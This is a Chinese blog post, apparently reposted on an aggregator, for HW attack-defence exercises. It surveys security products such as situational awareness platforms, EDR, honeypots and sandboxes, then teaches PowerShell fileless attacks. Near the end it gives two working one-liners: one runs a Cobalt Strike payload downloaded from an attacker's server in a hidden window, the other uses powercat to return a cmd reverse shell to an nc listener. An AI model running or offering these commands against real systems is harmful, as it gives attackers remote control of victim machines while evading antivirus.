2024HW --> 安全产品 Powershell无文件落地攻击

news2024/11/18 2:31:19

在HW中,除了了解中间件,web漏洞,这些攻击的手法,还得了解应急响应,安全产品,入侵排查,溯源反制...... 那么今天,就来说一下安全产品(安全公司我就不说了,这个大家都知道)

目录

1.态势感知

2.EDR

3.蜜罐

4.沙箱

5.威胁情报平台

6.Powershell无文件落地攻击!!!


1.态势感知

所谓的态势感知,就是我们在电视剧或者电影中经常见到的大屏幕上的画面(对没错,就是这样,十分的酷炫)

通过态势感知系统,我们可以清晰的看见攻击的来源以及攻击方法以及攻击的时间等等..... 

像深信服的SIP态势感知系统,就是一个很好的态势感知案例(真的一目了然)

其工作原理就是通过在各个子公司,或者办公区的核心交换机上面装一个探针,然后将通过交换机的流量进行copy一份,然后实时传输到态势感知的系统上面,供响应的人员进行查看

大概就是这样

2.EDR

EDR(Endpoint Detection and Response)终端检测与响应分析

这个就是通过在你的办公的电脑上装一个软件,通过这样,将多台设备联合在一起,进行监控和实时探测的目的(难听一点就是监控着你每天在干嘛,有点那个啥的)

通过EDR,我们可以实现监视终端以检测可疑活动,并捕获可疑数据以进行安全取证及调查。

3.蜜罐

随着技术的发展,科技也是越来越成熟,蜜罐也是。(相信是每个黑客最痛恨的了吧)

比较出名的民用的蜜罐就应该是Hfish了吧

这个蜜罐挺厉害的,提供了各种如OA,gitlab,redis,以及一些出名端口如22,3306,7001等诱导黑客来攻击,当黑客攻击的时候,就"中了蜜罐"。

通过蜜罐,我们能获取黑客的IP(一般是代理),0DAY(能获得这个就收获大了),误导黑客的攻击方向,或者延缓他们的攻击脚步,当然了,说不定还能获取他们个人信息如手机号,微信号等等个人隐私(反正蜜罐效果还是不错的)

4.沙箱

这个的作用也很大,在日常生活中我们的好兄弟经常回给我们发一些如1个T的学习资料以及一些好看的东西等等!!

但是我们又不知道有没有病毒,那能怎么办呢??? 沙箱就诞生了

安全沙箱技术是一种用于隔离应用程序或进程的安全机制,它可以在计算机系统中创建一个受限的环境,以防止应用程序或进程对系统造成潜在的安全威胁

通过沙箱,我们可以对这个exe,文件等进行威胁分析,来查看它们是否会产生一些威胁的做法

就像这样

5.威胁情报平台

这个没什么说的,我直接推荐微步好吧(挺出名的)

你有什么子域名啊,ip啊,都可以往上面扔一下,说不定能得到一些对应的信息

好了,那么差不多咯???

不对   不能水文章,还得写点东西

那么就来讲一下一种很酷炫的攻击吧(从名字都知道很酷炫)

6.Powershell无文件落地攻击!!!

是不是听起来就很酷炫,那么下面我们就来讲解一下这个东西

传统的恶意软件(例如.exe)攻击感染一个系统之前会把恶意文件(例如exe)复制到目标磁盘中并修改注册表并连接到此文件来达到一个长期隐藏的目的,无文件落地攻击是指即不向磁盘写入可执行文件,而是以脚本形式存在计算机中的注册表子项目中,以此来躲避杀软的检测,那么绕过了传统防病毒(AV)寻找被保存到磁盘上的文件并扫描这些文件以确定它们是否恶意的查杀方法。

对于无文件落地攻击,一般分为以下这么几个步骤

1.远程加载恶意脚本
2.注入内存
3.写入注册表(或者自运行)

然而对于powershell

powershell作为微软windows系统自带的软件包,具有十分强大的功能,越来越多的攻击者选用powershell作为攻击手段。PowerShell的主要作用是从远程位置下载恶意文件到受害者主机中,然后使用诸如Start-Porcess、Invoke-Item或者Invoke-Expression(-IEX)之类的命令执行恶意文件,PowerShell也可以将远程文件直接下载到受害者主机内存中,然后从内存中执行

首先,我们来讲一下powershell无文件反弹shell

1.CS自带powershell_payload

这个反弹shell还是不错的!!!!

首先我们去生成一段powershell的payload,然后部署在我们自己的VPS

然后传上去,开一个http服务

然后我们去存在RCE的主机上直接执行以下的命令

powershell.exe -nop -w hidden -c "IEX ((new-object net.webclient).downloadstring('http://你公网的ip:公网的端口/powershell.ps1'))"

而且在别人的服务器上面,是不会产生任何的文件的,这样,就能达到了无文件落地攻击的效果

2.NC联动powercat反弹shell

除了上面的做法,我们还可以通过nc来接受反弹的shell

powershell IEX (New-Object System.Net.Webclient).DownloadString('https://raw.githubusercontent.com/besimorhino/powercat/master/powercat.ps1'); powercat -c 你的公网ip -p 监听的端口 -e cmd

我们就能在公网看见我们的nc的shell了 

如果别人访问不到githu,那么我们最好就是去下载这个ps脚本吗,直接放在服务器上,效果也是一样的

除了以上,我们还有nishang配合powershell反弹shell ,Invoke-PowerShellTcp联动nc反弹shell

            

但是不管怎么样,我们都是通过powershell来实现了无文件落地的攻击的目的!!!

本文来自互联网用户投稿,该文观点仅代表作者本人,不代表本站立场。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。如若转载,请注明出处:http://www.coloradmin.cn/o/1594537.html

如若内容造成侵权/违法违规/事实不符,请联系多彩编程网进行投诉反馈,一经查实,立即删除!

相关文章

[linux]进程控制——进程创建

一、fork: 在linux中fork函数从已存在进程中,创建一个新进程。新进程为子进程,而原进程为父进程。 返回值:子进程中返回0,父进程返回子进程id,出错返回-1。 1、常规用法: 一个父进程希望复制…

【THM】Net Sec Challenge(网络安全挑战)-初级渗透测试

介绍 使用此挑战来测试您对网络安全模块中获得的技能的掌握程度。此挑战中的所有问题都可以仅使用nmap、telnet和来解决hydra。 挑战问题 您可以使用Nmap、 Telnet 和Hydra回答以下问题。 2.1小于10000的最大开放端口号是多少? 8080 nmap -p- -T4 10.10.234.218 2.2普通…

43岁百亿千金夫妇国外旅游高调放闪,羡煞好友马国明

萧正楠早前忙着拍摄TVB新剧《奔跑吧!勇敢的女人们》,剧集煞科后他即和老婆黄翠如一起到意大利旅行。两公婆分别在IG大晒旅行靓相,甜蜜满泻。 这次萧正楠的旅游照都是由翠如亲自操刀拍摄,相中所见,萧正楠在广场大摆Chok…

个人笔记目录

目录 一、lora 微调 alpaca 笔记 二、全量微调 Llama2-7b笔记 三、Huggingface trainer 与 from_pretrained简单介绍(笔记) 四、vscode调试launch.json常用格式 五、huggingface generate函数简介 六、Trl: llama2-7b-hf使用QLora 4bit量化后ds zer…

Linux —— FTP服务【从0-1】

目录 一、介绍 1.概述 2.FTP的传输模式 PORT 主动模式 PASV 被动模式 3.FTP服务的作用 二、搭建FTP服务器 FTP服务端配置 1.安装vsftpd文件服务 2.启动服务 3.防火墙配置 4.FTP服务相关文件说明 FTP客户端配置 1.安装FTP客户端工具 lftp 2.访问FTP服务器 Linux系…

【第十二届“泰迪杯”数据挖掘挑战赛】【2024泰迪杯】B题基于多模态特征融合的图像文本检索—更新(正式比赛)

【第十二届“泰迪杯”数据挖掘挑战赛】【2024泰迪杯】B题基于多模态特征融合的图像文本检索—更新(正式比赛) 往期链接: 【第十二届“泰迪杯”数据挖掘挑战赛】【2024泰迪杯】B题基于多模态特征融合的图像文本检索—解题全流程(…

Java集合(一)--Map(2)

ConcurrentHashMap与HashTable 底层实现 在JDK1.7时,底层采用的是分段数组+链表的形式,在JDK1.8之后,采用的是与HashMap相同的形式,数组链表/红黑树。而HashTable采用的是数组链表的形式。 如何实现线程安全 Concu…

QT助手翻译【QT 5.14】 -----QPushButton

目录 1 属性 2 公共职能 3 重新实现的公共功能 4 公用插槽 5 受保护的功能 6 保护方法 7 详细说明 1 属性 自动默认值:bool 此属性保存按钮是否为自动默认按钮 如果此属性设置为true,则该按钮为自动默认按钮。 在某些GUI样式中&a…

Google Imagen 2对比OpenAI的Dall-E 3 - 同一提示,不同结果

每周跟踪AI热点新闻动向和震撼发展 想要探索生成式人工智能的前沿进展吗?订阅我们的简报,深入解析最新的技术突破、实际应用案例和未来的趋势。与全球数同行一同,从行业内部的深度分析和实用指南中受益。不要错过这个机会,成为AI领…

超市商场客户细分项目

注意:本文引用自专业人工智能社区Venus AI 更多AI知识请参考原站 ([www.aideeplearning.cn]) 项目背景 在竞争激烈的商业环境中,了解和满足客户的需求是任何成功商场的关键要素。为了更好地理解我们的客户并制定有针对性的营销…

网页布局再次复现

华子目录 普通文档流布局table布局table布局的不足之处 浮动布局浮动优点浮动用途 定位布局相对定位特点: 绝对定位特点: 固定定位 divcss布局div盒子模型标准盒子模型div盒子组成注意 CSS弹性盒子CSS3 弹性盒子常用属性flex使用三要素flex-direction设置…

5.9 mybatis之callSettersOnNulls作用

文章目录 1. 当callSettersOnNullstrue时2. 当callSettersOnNullsfalse时 在mybatis的settings配置参数中有个callSettersOnNulls参数,官方解释为:指定当结果集中值为 null 的时候是否调用映射对象的 setter(map 对象时为 put)方法…

SecureCRT日志记录的7个经典配置记录与14个环境变量(%Y-%M-%D_%H_%S_session.log %t )

每次更换电脑、主机或者环境都需要配置一遍SecureCRT的参数。感觉就最近十年都已经设置过上百次了。其实设置没什么特别的,只是经过不断地打磨,主打的就是一个经济实用。经常忘记,特此记录。 配置方式 建议直接配置默认session:…

error:0308010C:digital envelope routines::unsupported(问题分析)

error:0308010C:digital envelope routines::unsupported 情况一:就是网上大部分人说的node 17版本的问题 出现这个错误是因为 node.js V17版本中最近发布的OpenSSL3.0, 而OpenSSL3.0对允许算法和密钥大小增加了严格的限制,可能会对生态系统造成一些影响…

宝妈如何在家创造收入?五种兼职工作让你轻松赚钱!

许多宝妈为了陪伴孩子成长,毅然选择了全职妈妈的角色,然而,她们内心仍希望能有一份收入,实现经济独立。于是,寻找既能照顾家庭又能赚钱的工作成了她们的迫切需求。 然而,这样的需求也往往让宝妈们成为一些…

策略为王股票软件源代码\StkUI\View\BaseView.cpp-------显示股票基本资料的视图-------程序代码都在里面了

CString strHeader info.GetStockCode(); strHeader " "; /修改 strHeader info.GetStockName(); strHeader "\r\n\r\n "; GetEditCtrl().SetWindowText( strHeader ); GetEditCtrl().SetSel…

寻找心灵慰藉:这些平台上有最好的解压视频

在这个快节奏的社会中,解压视频成为了我们放松心情的小帮手。这些视频通常具有令人着迷的视觉效果和舒缓的背景音乐,能够帮助我们暂时脱离紧张的工作或生活状态。如果你正在寻找这样的视频,以下几个平台可以满足你的需求: 蛙学网…

AI在运维实践中的价值提升

在2024年的AI赛道上,利用大数据 、机器学习算法、人工智能来改善运维效率已成为软件运营商发展的新主张,通过AI在运维流程的洞察、决策和执行,从而提升效率、减少故障时间,优化用户体验。通过分析大量数据来识别趋势和模式&#x…

免费VPS云服务器汇总,最长永久免费使用

目前云服务器市场竞争很激烈,为了方便吸引上云,很多云计算服务商提供免费试用云服务器,下面给大家整理汇总一下免费VPS云服务器,最长永久免费使用! 一、雨云(优惠码:ABC) 活动地址:…

Python爬虫-京东商品评论数据

前言 本文是该专栏的第68篇,后面会持续分享python爬虫干货知识,记得关注。 在本专栏之前,笔者有详细介绍京东滑块验证码的解决方法,感兴趣的同学,可以直接翻阅文章《Python如何解决“京东滑块验证码”(5)》进行查看。 而本文,笔者以京东商品详情页的评论数据为例,通过…